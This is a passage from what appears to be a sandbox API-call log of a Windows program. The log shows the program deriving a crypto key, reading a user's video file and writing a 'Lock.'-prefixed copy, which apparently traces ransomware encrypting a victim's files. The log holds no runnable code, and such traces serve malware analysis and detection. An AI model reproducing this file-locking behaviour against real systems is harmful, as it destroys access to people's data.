cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0214.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab4e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0214.819] CryptDeriveKey (in: hProv=0xa7c330, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.819] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0214.819] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.819] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0214.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0214.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fa0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0214.819] CryptDestroyHash (hHash=0x9e2138) returned 1 [0214.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0214.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0214.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/vMM vqaD0kHJ4F.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\vmm vqad0khj4f.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0214.821] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.821] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0214.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0214.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0214.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0214.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0214.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0214.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d90 [0214.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.823] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0214.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d90 | out: hHeap=0x2af0000) returned 1 [0214.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0214.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0214.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0214.824] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.vMM vqaD0kHJ4F.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\lock.vmm vqad0khj4f.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0214.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0214.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0214.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0214.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0214.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0214.829] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0214.829] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0xbb15, lpOverlapped=0x0) returned 1 [0214.831] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0214.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0214.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xbb15) returned 0x2a8a138 [0214.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0214.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0214.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xbb15) returned 0x2a95c58 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xbb15) returned 0x2a8a138 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0214.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0214.837] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0214.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0214.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xbb15) returned 0x2a8a138 [0214.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0214.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab278 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0214.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0214.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xbb15) returned 0x2aae878 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0214.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0214.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: 